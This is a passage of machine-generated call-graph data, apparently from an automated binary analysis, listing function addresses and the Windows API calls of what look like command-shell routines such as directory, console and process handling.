7ff789bd9a6c 17276->17282 17278 7ff789bcca7b 17278->17180 17278->17181 17287 7ff789be6c5c 17279->17287 17283 7ff789bd9a86 malloc 17282->17283 17284 7ff789bd9a91 17283->17284 17285 7ff789bd9a77 17283->17285 17284->17278 17285->17283 17286 7ff789bd9a97 Concurrency::cancel_current_task 17285->17286 17286->17278 17290 7ff789be6a34 17287->17290 17291 7ff789be6a41 17290->17291 17298 7ff789be63fc 17291->17298 17293 7ff789be6b1d 17295 7ff789bd8f80 7 API calls 17293->17295 17296 7ff789be6b2e 17295->17296 17296->17176 17299 7ff789be6455 17298->17299 17300 7ff789be6461 17298->17300 17299->17300 17301 7ff789be6c5c 11 API calls 17299->17301 17302 7ff789be64f9 GetCurrentThreadId 17300->17302 17301->17300 17303 7ff789be6561 17302->17303 17304 7ff789be65ea 17303->17304 17305 7ff789be65f5 IsDebuggerPresent 17303->17305 17306 7ff789be666c OutputDebugStringW 17304->17306 17308 7ff789be660b 17304->17308 17313 7ff789be5bf4 17304->17313 17305->17304 17306->17308 17308->17293 17309 7ff789be742c 17308->17309 17310 7ff789be7444 17309->17310 17311 7ff789be744a memset 17309->17311 17310->17311 17312 7ff789be7489 17311->17312 17316 7ff789be5c2e 17313->17316 17339 7ff789be5e13 17313->17339 17314 7ff789bd8f80 7 API calls 17315 7ff789be5e49 17314->17315 17315->17306 17317 7ff789be5ca7 FormatMessageW 17316->17317 17316->17339 17318 7ff789be5d1f 17317->17318 17319 7ff789be5cfc 17317->17319 17320 7ff789be66bc _vsnwprintf 17318->17320 17342 7ff789be66bc 17319->17342 17322 7ff789be5d1d 17320->17322 17323 7ff789be5d54 GetCurrentThreadId 17322->17323 17324 7ff789be66bc _vsnwprintf 17322->17324 17325 7ff789be66bc _vsnwprintf 17323->17325 17326 7ff789be5d51 17324->17326 17327 7ff789be5d91 17325->17327 17326->17323 17328 7ff789be66bc _vsnwprintf 17327->17328 17327->17339 17329 7ff789be5db9 17328->17329 17330 7ff789be5dd4 17329->17330 17332 7ff789be66bc _vsnwprintf 17329->17332 17331 7ff789be5def 17330->17331 17333 7ff789be66bc _vsnwprintf 17330->17333 17334 7ff789be5e15 17331->17334 17335 7ff789be5dff 17331->17335 17332->17330 17333->17331 17337 7ff789be5e2b 17334->17337 17338 7ff789be5e1d 17334->17338 17336 7ff789be66bc _vsnwprintf 17335->17336 17336->17339 17341 7ff789be66bc _vsnwprintf 17337->17341 17340 7ff789be66bc _vsnwprintf 17338->17340 17339->17314 17340->17339 17341->17339 17345 7ff789bd363c 17342->17345 17346 7ff789bd3664 17345->17346 17347 7ff789bd3671 17345->17347 17348 7ff789bd3684 _vsnwprintf 17346->17348 17347->17322 17348->17347 17350 7ff789bccd90 166 API calls 17349->17350 17351 7ff789bcb9a1 17350->17351 17352 7ff789bcb9a6 17351->17352 17353 7ff789bee91c 198 API calls 17351->17353 17352->17190 17354 7ff789bcb9b1 memset 17353->17354 17356 7ff789bcca40 17 API calls 17354->17356 17359 7ff789bcba4c 17356->17359 17357 7ff789bdc3a8 17357->17357 17360 7ff789bcb998 199 API calls 17357->17360 17358 7ff789bcba80 wcschr 17358->17359 17361 7ff789bcbadb 17358->17361 17359->17357 17359->17358 17359->17361 17363 7ff789bcbaa0 wcschr 17359->17363 17365 7ff789bcbb05 17359->17365 17368 7ff789bcbb47 17359->17368 17367 7ff789bdc41a 17360->17367 17361->17357 17362 7ff789bcbcef GetFileAttributesW 17361->17362 17361->17365 17362->17365 17363->17359 17364 7ff789bc88a8 _wcsicmp 17375 7ff789bcbc46 17364->17375 17366 7ff789bcbb29 _wcsicmp 17365->17366 17365->17368 17366->17365 17368->17357 17368->17364 17369 7ff789bcbb6b 17368->17369 17369->17357 17371 7ff789bcbb92 17369->17371 17370 7ff789bcbc82 iswspace 17370->17369 17372 7ff789bcbc99 wcschr 17370->17372 17373 7ff789bcbbe2 ??_V@YAXPEAX 17371->17373 17374 7ff789bcbbee 17371->17374 17372->17369 17372->17375 17373->17374 17376 7ff789bd8f80 7 API calls 17374->17376 17375->17357 17375->17369 17375->17370 17377 7ff789bcbc01 17376->17377 17377->17190 17386 7ff789bc3410 17378->17386 17381 7ff789bcb998 207 API calls 17382 7ff789beeb2e 17381->17382 17382->17217 17403 7ff789bc32b0 17383->17403 17387 7ff789be12cd _ultoa GetACP 17386->17387 17388 7ff789bc345c FormatMessageW 17386->17388 17401 7ff789bd0460 17387->17401 17388->17387 17393 7ff789bc348b 17388->17393 17391 7ff789bc34b4 17394 7ff789bc34c4 FormatMessageW 17391->17394 17395 7ff789be121d GetProcessHeap HeapAlloc 17391->17395 17392 7ff789bc349d wcschr 17392->17391 17392->17393 17393->17391 17393->17392 17396 7ff789bc34ef 17394->17396 17395->17396 17400 7ff789be124f FormatMessageW GetProcessHeap RtlFreeHeap 17395->17400 17397 7ff789bd8f80 7 API calls 17396->17397 17399 7ff789bc34ff 17397->17399 17399->17381 17400->17387 17402 7ff789bd0472 MultiByteToWideChar 17401->17402 17439 7ff789bd3578 _get_osfhandle 17403->17439 17406 7ff789bc331d 17408 7ff789bc3410 18 API calls 17406->17408 17407 7ff789bc32f0 _get_osfhandle GetConsoleScreenBufferInfo 17407->17406 17422 7ff789bc333d 17408->17422 17409 7ff789bc33a8 17411 7ff789bc33b0 17409->17411 17415 7ff789be11ff 17409->17415 17410 7ff789bc3368 WriteConsoleW 17413 7ff789be11cc GetLastError 17410->17413 17410->17422 17417 7ff789bd8f80 7 API calls 17411->17417 17413->17422 17414 7ff789be1057 GetConsoleScreenBufferInfo 17418 7ff789be1079 WriteConsoleW 17414->17418 17414->17422 17454 7ff789bd4c1c 17415->17454 17416 7ff789be11df GetLastError 17416->17409 17423 7ff789bc326c 17417->17423 17418->17422 17424 7ff789be10a8 9 API calls 17418->17424 17421 7ff789bc3400 17421->17416 17422->17409 17422->17410 17422->17413 17422->17414 17422->17416 17422->17421 17446 7ff789bd36ec _get_osfhandle 17422->17446 17423->17220 17424->17422 17425 7ff789be1181 17424->17425 17453 7ff789bebde4 EnterCriticalSection LeaveCriticalSection 17425->17453 17440 7ff789bd3599 GetFileType 17439->17440 17445 7ff789bc32e8 17439->17445 17443 7ff789bd35b1 17440->17443 17440->17445 17441 7ff789bde940 17442 7ff789bd35d2 AcquireSRWLockShared GetConsoleMode ReleaseSRWLockShared 17442->17445 17443->17441 17443->17442 17444 7ff789bd35c3 GetStdHandle 17443->17444 17444->17442 17445->17406 17445->17407 17447 7ff789bde95c WriteFile 17446->17447 17450 7ff789bd3731 17446->17450 17448 7ff789bde980 WideCharToMultiByte WriteFile 17447->17448 17448->17450 17452 7ff789bd37a1 17448->17452 17449 7ff789bd3747 17451 7ff789bd374b WideCharToMultiByte WriteFile 17449->17451 17449->17452 17450->17448 17450->17449 17450->17452 17451->17452 17452->17422 17455 7ff789bd4c24 17454->17455 17457 7ff789bd4c2f exit 17455->17457 17458 7ff789bd4c50 17455->17458 17464 7ff789bd4cb0 17458->17464 17460 7ff789bd4c6c 17460->17455 17465 7ff789bd4cda 17464->17465 17468 7ff789bd4cfa 17464->17468 17466 7ff789bd8f80 7 API calls 17465->17466 17467 7ff789bd4c64 17466->17467 17467->17460 17470 7ff789bd3c24 17467->17470 17468->17465 17469 7ff789bdeefe realloc 17468->17469 17469->17465 17471 7ff789bd3c67 17470->17471 17472 7ff789bcca40 17 API calls 17471->17472 17517 7ff789bd412c 17471->17517 17474 7ff789bd3c94 17472->17474 17473 7ff789bd8f80 7 API calls 17475 7ff789bd413e GetProcessHeap RtlFreeHeap 17473->17475 17476 7ff789bdec97 17474->17476 17535 7ff789bcb900 17474->17535 17475->17460 17477 7ff789bd855c ??_V@YAXPEAX 17476->17477 17479 7ff789bdeca1 17477->17479 17481 7ff789bd3cb8 GetCurrentDirectoryW towupper iswalpha 17483 7ff789bd3fb8 17481->17483 17484 7ff789bd3d68 17481->17484 17486 7ff789bd3fc6 GetLastError 17483->17486 17484->17483 17485 7ff789bd3d72 towupper GetFullPathNameW 17484->17485 17485->17486 17487 7ff789bd3dd3 17485->17487 17488 7ff789bd855c ??_V@YAXPEAX 17486->17488 17489 7ff789bd3fe0 17487->17489 17497 7ff789bd3de3 17487->17497 17488->17489 17491 7ff789bd855c ??_V@YAXPEAX 17489->17491 17490 7ff789bd40fe 17493 7ff789bd855c ??_V@YAXPEAX 17490->17493 17492 7ff789bd3ffb _local_unwind 17491->17492 17494 7ff789bd400c GetLastError 17492->17494 17495 7ff789bd4108 _local_unwind 17493->17495 17498 7ff789bd3e95 17494->17498 17499 7ff789bd4028 17494->17499 17496 7ff789bd3f98 17495->17496 17566 7ff789bcff70 17496->17566 17497->17490 17506 7ff789bd3e66 GetFileAttributesW 17497->17506 17502 7ff789bd3ecf 17498->17502 17539 7ff789bd2978 17498->17539 17499->17498 17501 7ff789bd4031 17499->17501 17507 7ff789bd855c ??_V@YAXPEAX 17501->17507 17504 7ff789bd3ed5 GetFileAttributesW 17502->17504 17505 7ff789bd3f08 17502->17505 17511 7ff789bd3efd 17504->17511 17512 7ff789bd4067 GetLastError 17504->17512 17513 7ff789bd3f1e SetCurrentDirectoryW 17505->17513 17519 7ff789bd3f46 17505->17519 17506->17494 17506->17498 17514 7ff789bd403b _local_unwind 17507->17514 17509 7ff789bd3ec7 17509->17502 17515 7ff789bd404c 17509->17515 17510 7ff789bd855c ??_V@YAXPEAX 17510->17517 17511->17505 17518 7ff789bd409d 17511->17518 17516 7ff789bd855c ??_V@YAXPEAX 17512->17516 17513->17519 17520 7ff789bd40b8 GetLastError 17513->17520 17514->17515 17525 7ff789bd855c ??_V@YAXPEAX 17515->17525 17521 7ff789bd408c _local_unwind 17516->17521 17517->17473 17522 7ff789bd855c ??_V@YAXPEAX 17518->17522 17552 7ff789bd498c 17519->17552 17523 7ff789bd855c ??_V@YAXPEAX 17520->17523 17521->17518 17527 7ff789bd40a7 _local_unwind 17522->17527 17528 7ff789bd40d2 _local_unwind 17523->17528 17526 7ff789bd4056 _local_unwind 17525->17526 17526->17512 17527->17520 17530 7ff789bd40e3 17528->17530 17532 7ff789bd855c ??_V@YAXPEAX 17530->17532 17531 7ff789bd3f6f 17557 7ff789bd417c 17531->17557 17534 7ff789bd40ed _local_unwind 17532->17534 17534->17490 17536 7ff789bcb914 17535->17536 17536->17536 17537 7ff789bccd90 166 API calls 17536->17537 17538 7ff789bcb92a 17537->17538 17538->17476 17538->17481 17543 7ff789bd29b9 17539->17543 17540 7ff789bd2a1e FindFirstFileW 17541 7ff789bd2a44 FindClose 17540->17541 17545 7ff789bde3f7 17540->17545 17541->17543 17542 7ff789bd29ed 17546 7ff789bd8f80 7 API calls 17542->17546 17543->17540 17543->17542 17543->17543 17544 7ff789bd2aeb _wcsnicmp 17543->17544 17543->17545 17548 7ff789bde3d6 _wcsicmp 17543->17548 17549 7ff789bde404 memmove 17543->17549 17550 7ff789bd2a9d memmove 17543->17550 17544->17543 17545->17509 17547 7ff789bd2a02 17546->17547 17547->17509 17548->17543 17548->17545 17549->17545 17550->17543 17553 7ff789bd49ba SetEnvironmentVariableW GetProcessHeap RtlFreeHeap 17552->17553 17555 7ff789bd49a4 17552->17555 17570 7ff789bd4a14 GetEnvironmentStringsW 17553->17570 17555->17553 17558 7ff789bd41d4 towupper 17557->17558 17559 7ff789bd41a8 GetCurrentDirectoryW 17557->17559 17561 7ff789bd081c 163 API calls 17558->17561 17560 7ff789bd41b9 17559->17560 17563 7ff789bd8f80 7 API calls 17560->17563 17562 7ff789bd4204 17561->17562 17562->17560 17564 7ff789bdecac towupper 17562->17564 17565 7ff789bd41c8 17563->17565 17565->17496 17567 7ff789bcff7c 17566->17567 17568 7ff789bcffdb 17566->17568 17567->17568 17569 7ff789bcffb5 GetProcessHeap RtlFreeHeap 17567->17569 17568->17510 17569->17568 17571 7ff789bd4a40 GetProcessHeap RtlAllocateHeap 17570->17571 17572 7ff789bd3f67 17570->17572 17574 7ff789bd4a9f FreeEnvironmentStringsW 17571->17574 17575 7ff789bd4a91 memmove 17571->17575 17572->17530 17572->17531 17574->17572 17575->17574 17577 7ff789bcb6d0 GetProcessHeap HeapReAlloc 17576->17577 17578 7ff789bdc34c 17576->17578 17577->17578 17579 7ff789bcb6ff GetProcessHeap HeapSize 17577->17579 17580 7ff789bc3278 166 API calls 17578->17580 17582 7ff789bcb726 17579->17582 17581 7ff789bdc356 17580->17581 17581->17237 17582->17237 17586 7ff789bdecd4 GetLastError 17585->17586 17587 7ff789bd42ab UpdateProcThreadAttribute 17585->17587 17588 7ff789bdecee 17586->17588 17589 7ff789bdecf0 GetLastError 17587->17589 17590 7ff789bd42eb memset memset GetStartupInfoW 17587->17590 17694 7ff789be9eec 17589->17694 17669 7ff789bd3a90 17590->17669 17595 7ff789bcb900 166 API calls 17596 7ff789bd43bb 17595->17596 17597 7ff789bd43cc 17596->17597 17598 7ff789bd4638 _local_unwind 17596->17598 17599 7ff789bd4415 17597->17599 17600 7ff789bd43de wcsrchr 17597->17600 17598->17597 17681 7ff789bd5a68 _get_osfhandle SetConsoleMode _get_osfhandle SetConsoleMode 17599->17681 17600->17599 17601 7ff789bd43f7 lstrcmpW 17600->17601 17601->17599 17603 7ff789bd4668 17601->17603 17682 7ff789be9044 17603->17682 17604 7ff789bd441a 17606 7ff789bd442a CreateProcessW 17604->17606 17607 7ff789bd4596 CreateProcessAsUserW 17604->17607 17608 7ff789bd448b 17606->17608 17607->17608 17609 7ff789bd4495 CloseHandle 17608->17609 17610 7ff789bd4672 GetLastError 17608->17610 17611 7ff789bd498c 8 API calls 17609->17611 17621 7ff789bd468d 17610->17621 17612 7ff789bd44c5 17611->17612 17614 7ff789bd44cd 17612->17614 17612->17621 17613 7ff789bd47a3 17613->16982 17614->17613 17632 7ff789bea250 33 API calls 17614->17632 17636 7ff789bd44f8 17614->17636 17615 7ff789bccd90 166 API calls 17618 7ff789bd4724 17615->17618 17616 7ff789bd5cb4 7 API calls 17620 7ff789bd4517 17616->17620 17617 7ff789bd461c 17623 7ff789bcff70 GetProcessHeap RtlFreeHeap 17617->17623 17622 7ff789bd472c _local_unwind 17618->17622 17625 7ff789bd473d 17618->17625 17619 7ff789bd47e1 CloseHandle 17619->17617 17624 7ff789bd33f0 _vsnwprintf 17620->17624 17621->17614 17621->17615 17622->17625 17626 7ff789bd47fa DeleteProcThreadAttributeList 17623->17626 17627 7ff789bd4544 17624->17627 17633 7ff789bcff70 GetProcessHeap RtlFreeHeap 17625->17633 17628 7ff789bd8f80 7 API calls 17626->17628 17629 7ff789bd498c 8 API calls 17627->17629 17630 7ff789bd4820 17628->17630 17631 7ff789bd4558 17629->17631 17630->16982 17634 7ff789bd4564 17631->17634 17635 7ff789bd47ae 17631->17635 17632->17636 17637 7ff789bd475b _local_unwind 17633->17637 17638 7ff789bd498c 8 API calls 17634->17638 17639 7ff789bd33f0 _vsnwprintf 17635->17639 17636->17613 17636->17616 17641 7ff789bd4612 17636->17641 17637->17614 17640 7ff789bd4577 17638->17640 17639->17641 17640->17617 17642 7ff789bd457f 17640->17642 17641->17617 17641->17619 17643 7ff789bea920 210 API calls 17642->17643 17644 7ff789bd4584 17643->17644 17644->17617 17650 7ff789bc9737 17645->17650 17647 7ff789bc977d memset 17649 7ff789bcca40 17 API calls 17647->17649 17648 7ff789bccd90 166 API calls 17648->17650 17649->17650 17650->17647 17650->17648 17651 7ff789bdb76e 17650->17651 17652 7ff789bdb7b3 17650->17652 17653 7ff789bdb79a 17650->17653 17663 7ff789bc986d 17650->17663 17701 7ff789bcb364 17650->17701 17707 7ff789bd1fac memset 17650->17707 17734 7ff789bcce10 17650->17734 17784 7ff789bc96b4 17650->17784 17789 7ff789bd5920 17650->17789 17654 7ff789bc3278 166 API calls 17651->17654 17656 7ff789bd855c ??_V@YAXPEAX 17653->17656 17657 7ff789bdb787 17654->17657 17656->17652 17658 7ff789bdb795 17657->17658 17795 7ff789bee944 17657->17795 17803 7ff789be7694 17658->17803 17665 7ff789bc9880 ??_V@YAXPEAX 17663->17665 17666 7ff789bc988c 17663->17666 17665->17666 17667 7ff789bd8f80 7 API calls 17666->17667 17668 7ff789bc989d 17667->17668 17668->16982 17670 7ff789bd3aa4 17669->17670 17679 7ff789bd3b73 17669->17679 17670->17679 17696 7ff789bd09f4 17670->17696 17673 7ff789bcb900 166 API calls 17674 7ff789bd3ad0 17673->17674 17675 7ff789bd3ad8 wcsrchr 17674->17675 17678 7ff789bd3af4 17674->17678 17675->17678 17676 7ff789bd3b66 17677 7ff789bcff70 2 API calls 17676->17677 17677->17679 17678->17676 17680 7ff789bd3b2d _wcsnicmp 17678->17680 17679->17595 17680->17678 17683 7ff789bd3a90 170 API calls 17682->17683 17684 7ff789be9064 17683->17684 17685 7ff789be9083 17684->17685 17686 7ff789be906e 17684->17686 17689 7ff789bccd90 166 API calls 17685->17689 17687 7ff789bd498c 8 API calls 17686->17687 17688 7ff789be9081 17687->17688 17688->17599 17690 7ff789be909b 17689->17690 17690->17688 17691 7ff789bd498c 8 API calls 17690->17691 17692 7ff789be90ec 17691->17692 17693 7ff789bcff70 2 API calls 17692->17693 17693->17688 17695 7ff789bded0a DeleteProcThreadAttributeList 17694->17695 17695->17588 17697 7ff789bd0a0b iswspace 17696->17697 17698 7ff789bd0a3c 17696->17698 17699 7ff789bd0a21 wcschr 17697->17699 17700 7ff789bd0a50 17697->17700 17698->17673 17699->17698 17699->17700 17700->17697 17700->17698 17700->17699 17702 7ff789bcca40 17 API calls 17701->17702 17703 7ff789bcb396 17702->17703 17704 7ff789be6d1c 14 API calls 17703->17704 17705 7ff789bcb3ca 17703->17705 17706 7ff789bdc27c 17704->17706 17705->17650 17709 7ff789bd203b 17707->17709 17708 7ff789bd20b0 17712 7ff789bd211c 17708->17712 17820 7ff789bd3060 17708->17820 17709->17708 17710 7ff789bd2094 17709->17710 17713 7ff789bd20a6 17710->17713 17714 7ff789bc3278 166 API calls 17710->17714 17712->17713 17809 7ff789bd2e44 17712->17809 17716 7ff789bd8f80 7 API calls 17713->17716 17714->17713 17717 7ff789bd2325 17716->17717 17717->17650 17718 7ff789bd2148 17718->17713 17814 7ff789bd2d70 17718->17814 17721 7ff789bcb900 166 API calls 17723 7ff789bd21d0 17721->17723 17722 7ff789bde04a ??_V@YAXPEAX 17722->17713 17723->17722 17724 7ff789bd221c wcsspn 17723->17724 17733 7ff789bd22a4 ??_V@YAXPEAX 17723->17733 17726 7ff789bcb900 166 API calls 17724->17726 17727 7ff789bd223b 17726->17727 17727->17722 17731 7ff789bd2252 17727->17731 17728 7ff789bd228f 17729 7ff789bcd3f0 223 API calls 17728->17729 17729->17733 17730 7ff789bde06d wcschr 17730->17731 17731->17728 17731->17730 17732 7ff789bde090 towupper 17731->17732 17732->17728 17732->17731 17733->17713 17772 7ff789bcd0f8 17734->17772 17783 7ff789bcce5b 17734->17783 17735 7ff789bd8f80 7 API calls 17737 7ff789bcd10a 17735->17737 17736 7ff789bdc860 17738 7ff789bdc97c 17736->17738 17883 7ff789beee88 17736->17883 17737->17650 18001 7ff789bee9b4 17738->18001 17744 7ff789bdc99a 17747 7ff789bdc9b3 ??_V@YAXPEAX 17744->17747 17744->17772 17745 7ff789bdc882 EnterCriticalSection LeaveCriticalSection 17750 7ff789bcd0e3 17745->17750 17746 7ff789bdc95c 17746->17738 17751 7ff789bc96b4 186 API calls 17746->17751 17747->17772 17749 7ff789bcceaa _tell 17752 7ff789bcd208 _close 17749->17752 17750->17650 17751->17746 17752->17783 17753 7ff789bccd90 166 API calls 17753->17783 17754 7ff789bdc9d5 18013 7ff789bed610 17754->18013 17756 7ff789bcb900 166 API calls 17756->17783 17758 7ff789bdca07 17759 7ff789bee91c 198 API calls 17758->17759 17764 7ff789bdca0c 17759->17764 17760 7ff789bebfec 176 API calls 17761 7ff789bdc9f1 17760->17761 17763 7ff789bc3240 166 API calls 17761->17763 17762 7ff789bccf33 memset 17762->17783 17763->17758 17764->17650 17765 7ff789bcca40 17 API calls 17765->17783 17766 7ff789bcd184 wcschr 17766->17783 17768 7ff789bdc9c9 17770 7ff789bd855c ??_V@YAXPEAX 17768->17770 17769 7ff789bcd1a7 wcschr 17769->17783 17770->17772 17772->17735 17773 7ff789bd0a6c 273 API calls 17773->17783 17774 7ff789bcbe00 635 API calls 17774->17783 17776 7ff789bccfab _wcsicmp 17776->17783 17778 7ff789bcd003 GetConsoleOutputCP GetCPInfo 17779 7ff789bd04f4 3 API calls 17778->17779 17779->17783 17781 7ff789bd1fac 238 API calls 17781->17783 17782 7ff789bcd044 ??_V@YAXPEAX 17782->17783 17783->17736 17783->17744 17783->17750 17783->17753 17783->17754 17783->17756 17783->17762 17783->17765 17783->17766 17783->17768 17783->17769 17783->17772 17783->17773 17783->17774 17783->17776 17783->17781 17783->17782 17841 7ff789bd0494 17783->17841 17854 7ff789bcdf60 17783->17854 17874 7ff789bd0580 _get_osfhandle SetConsoleMode _get_osfhandle GetConsoleMode 17783->17874 17919 7ff789bebfec 17783->17919 17955 7ff789be778c 17783->17955 17986 7ff789bd3448 17783->17986 17991 7ff789bec738 17783->17991 17785 7ff789bdb6e2 RevertToSelf CloseHandle 17784->17785 17786 7ff789bc96c8 17784->17786 17787 7ff789bc96ce 17786->17787 17788 7ff789bc6a48 184 API calls 17786->17788 17787->17650 17788->17786 17790 7ff789bd5a12 17789->17790 17791 7ff789bd596c 17789->17791 17790->17650 17791->17790 17792 7ff789bd598d VirtualQuery 17791->17792 17792->17790 17794 7ff789bd59ad 17792->17794 17793 7ff789bd59b7 VirtualQuery 17793->17790 17793->17794 17794->17790 17794->17793 17796 7ff789bee954 17795->17796 17797 7ff789bee990 17795->17797 17799 7ff789beee88 390 API calls 17796->17799 17798 7ff789bee9b4 197 API calls 17797->17798 17800 7ff789bee995 longjmp 17798->17800 17801 7ff789bee964 17799->17801 17801->17797 17802 7ff789bc96b4 186 API calls 17801->17802 17802->17801 17804 7ff789be76a3 17803->17804 17805 7ff789be76b7 17804->17805 17807 7ff789bc96b4 186 API calls 17804->17807 17806 7ff789bee9b4 197 API calls 17805->17806 17808 7ff789be76bc longjmp 17806->17808 17807->17804 17810 7ff789bd9324 malloc 17809->17810 17811 7ff789bd2e7b 17810->17811 17812 7ff789bd2e83 memset 17811->17812 17813 7ff789bd2e90 17811->17813 17812->17813 17813->17718 17815 7ff789bd2da3 17814->17815 17816 7ff789bd2d89 17814->17816 17815->17816 17817 7ff789bd2dbc GetProcessHeap RtlFreeHeap 17815->17817 17819 7ff789bd21af 17816->17819 17830 7ff789bd2e0c 17816->17830 17817->17815 17817->17816 17819->17721 17834 7ff789bd1ea0 17820->17834 17822 7ff789bd3084 17823 7ff789bde4fc 17822->17823 17825 7ff789bd30b1 17822->17825 17824 7ff789bd417c 166 API calls 17823->17824 17829 7ff789bd311a 17824->17829 17826 7ff789bd30c8 SetErrorMode SetErrorMode GetFullPathNameW SetErrorMode 17825->17826 17827 7ff789bde557 17825->17827 17826->17829 17828 7ff789bd417c 166 API calls 17827->17828 17828->17829 17829->17712 17829->17829 17831 7ff789bd2e11 17830->17831 17832 7ff789bd2e32 17830->17832 17831->17832 17833 7ff789bde494 VirtualFree 17831->17833 17832->17816 17835 7ff789bd1ec4 17834->17835 17836 7ff789bd1eae wcschr 17834->17836 17835->17822 17836->17835 17838 7ff789bd1ece 17836->17838 17837 7ff789bd1f3f 17837->17822 17838->17837 17839 7ff789bd9158 7 API calls 17838->17839 17840 7ff789bd1f53 17839->17840 17843 7ff789bd04a4 17841->17843 17844 7ff789bd04b9 _get_osfhandle SetFilePointer 17843->17844 17845 7ff789bdd845 17843->17845 17847 7ff789bdd839 17843->17847 17849 7ff789bc3278 166 API calls 17843->17849 18022 7ff789bd26e0 17843->18022 17844->17783 18047 7ff789bef1d8 17845->18047 17848 7ff789bc3278 166 API calls 17847->17848 17850 7ff789bdd837 17848->17850 17851 7ff789bdd819 _getch 17849->17851 17851->17843 17852 7ff789bdd832 17851->17852 18046 7ff789bebde4 EnterCriticalSection LeaveCriticalSection 17852->18046 17855 7ff789bcdf93 17854->17855 17856 7ff789bcdfe2 17854->17856 17855->17856 17857 7ff789bcdf9f GetProcessHeap RtlFreeHeap 17855->17857 17858 7ff789bce100 VirtualFree 17856->17858 17859 7ff789bce00b _setjmp 17856->17859 17857->17855 17857->17856 17858->17856 17860 7ff789bce0c3 17859->17860 17861 7ff789bce04a 17859->17861 17860->17749 18056 7ff789bce600 17861->18056 17863 7ff789bce073 17864 7ff789bce0e0 longjmp 17863->17864 17865 7ff789bce081 17863->17865 17866 7ff789bce0b0 17864->17866 18065 7ff789bcd250 17865->18065 17866->17860 18096 7ff789bed3fc 17866->18096 17871 7ff789bce600 473 API calls 17872 7ff789bce0a7 17871->17872 17872->17866 17873 7ff789bed610 167 API calls 17872->17873 17873->17866 17875 7ff789bd05d5 17874->17875 17876 7ff789bd05ed _get_osfhandle GetConsoleMode 17874->17876 17875->17876 17877 7ff789bd0677 _get_osfhandle SetConsoleMode 17875->17877 17878 7ff789bd0615 17876->17878 17879 7ff789bd0653 17876->17879 17877->17876 17881 7ff789bd06ad 17877->17881 17878->17879 17880 7ff789bd0624 _get_osfhandle SetConsoleMode 17878->17880 17879->17778 17880->17879 17881->17876 17882 7ff789bdd87c _get_osfhandle SetConsoleMode 17881->17882 17882->17876 17884 7ff789beeed1 17883->17884 17885 7ff789beeefd 17883->17885 18478 7ff789bc7420 17884->18478 18492 7ff789bd885c FormatMessageW 17885->18492 17888 7ff789beef04 17894 7ff789beef41 LocalFree GetStdHandle GetConsoleMode 17888->17894 17898 7ff789beef2f _wcsupr 17888->17898 17890 7ff789bd01b8 6 API calls 17891 7ff789beeee5 17890->17891 17892 7ff789beeeeb 17891->17892 17893 7ff789beeef8 17891->17893 17895 7ff789bcd208 _close 17892->17895 17896 7ff789bcd208 _close 17893->17896 17899 7ff789beefcf SetConsoleMode 17894->17899 17900 7ff789beefe8 GetStdHandle GetConsoleMode 17894->17900 17916 7ff789beeef0 17895->17916 17896->17885 17898->17894 17899->17900 17902 7ff789bef015 SetConsoleMode 17900->17902 17917 7ff789bef03c 17900->17917 17901 7ff789bd8f80 7 API calls 17903 7ff789bdc879 17901->17903 17902->17917 17903->17745 17903->17746 17904 7ff789bc3240 166 API calls 17904->17917 17905 7ff789bd01b8 6 API calls 17905->17917 17906 7ff789bef07e GetStdHandle FlushConsoleInputBuffer 17906->17917 17907 7ff789bef0a0 GetStdHandle 17909 7ff789be8450 367 API calls 17907->17909 17908 7ff789bef12d wcschr 17908->17917 17909->17917 17910 7ff789bef161 17912 7ff789bef166 SetConsoleMode 17910->17912 17913 7ff789bef17a 17910->17913 17911 7ff789bd3448 166 API calls 17911->17908 17912->17913 17914 7ff789bef17f SetConsoleMode 17913->17914 17913->17916 17914->17916 17915 7ff789bef0d7 towupper 17915->17917 17916->17901 17917->17904 17917->17905 17917->17906 17917->17907 17917->17908 17917->17910 17917->17911 17917->17915 17918 7ff789bd3448 166 API calls 17917->17918 17918->17917 17920 7ff789bec036 17919->17920 17921 7ff789bec047 17919->17921 17922 7ff789bc3240 166 API calls 17920->17922 17923 7ff789bec6db 17921->17923 17926 7ff789bec067 17921->17926 17929 7ff789bd3448 166 API calls 17921->17929 17924 7ff789bec042 17922->17924 17925 7ff789bd8f80 7 API calls 17923->17925 18493 7ff789bd58e4 EnterCriticalSection LeaveCriticalSection 17924->18493 17928 7ff789bec6eb 17925->17928 17930 7ff789bd081c 166 API calls 17926->17930 17932 7ff789bec070 17926->17932 17928->17783 17929->17926 17930->17932 17931 7ff789bd417c 166 API calls 17933 7ff789bec0d1 17931->17933 17932->17931 18494 7ff789bebf84 17933->18494 17936 7ff789bec673 17937 7ff789bd33f0 _vsnwprintf 17936->17937 17938 7ff789bec696 17937->17938 17940 7ff789bd34a0 166 API calls 17938->17940 17939 7ff789bec1c5 towupper 17949 7ff789bec11a 17939->17949 17941 7ff789bec6ce 17940->17941 17941->17923 18568 7ff789bd58e4 EnterCriticalSection LeaveCriticalSection 17941->18568 17947 7ff789bec2db GetDriveTypeW 17947->17949 17948 7ff789bd33f0 _vsnwprintf 17951 7ff789bec5c8 LocalFree 17948->17951 17949->17938 17949->17939 17949->17947 17949->17948 17950 7ff789bd33f0 _vsnwprintf 17949->17950 17952 7ff789bec3ab 17949->17952 18502 7ff789bc586c GetVersion 17949->18502 18507 7ff789bd885c FormatMessageW 17949->18507 18508 7ff789bc6ee4 17949->18508 18542 7ff789bd3140 17949->18542 17950->17949 17951->17949 18498 7ff789bd33f0 17952->18498 17976 7ff789be77bc 17955->17976 17956 7ff789be7aca 17959 7ff789bd34a0 166 API calls 17956->17959 17957 7ff789be79c0 17963 7ff789bd34a0 166 API calls 17957->17963 17961 7ff789be7adb 17959->17961 17960 7ff789be7ab5 17964 7ff789bd3448 166 API calls 17960->17964 17966 7ff789be7af0 17961->17966 17970 7ff789bd3448 166 API calls 17961->17970 17962 7ff789be7984 17962->17957 17967 7ff789be7989 17962->17967 17969 7ff789be79d6 17963->17969 17978 7ff789be79ef 17964->17978 17965 7ff789be7a00 17974 7ff789be7a0b 17965->17974 17965->17978 17984 7ff789be7a33 17965->17984 17971 7ff789be778c 166 API calls 17966->17971 17967->17978 18586 7ff789be76e0 17967->18586 17968 7ff789bd3448 166 API calls 17968->17976 17972 7ff789bd3448 166 API calls 17969->17972 17985 7ff789be79e7 17969->17985 17970->17966 17975 7ff789be7afb 17971->17975 17972->17985 17974->17978 17979 7ff789bd34a0 166 API calls 17974->17979 17975->17967 17980 7ff789bd3448 166 API calls 17975->17980 17976->17956 17976->17957 17976->17960 17976->17962 17976->17965 17976->17967 17976->17968 17976->17978 17982 7ff789be778c 166 API calls 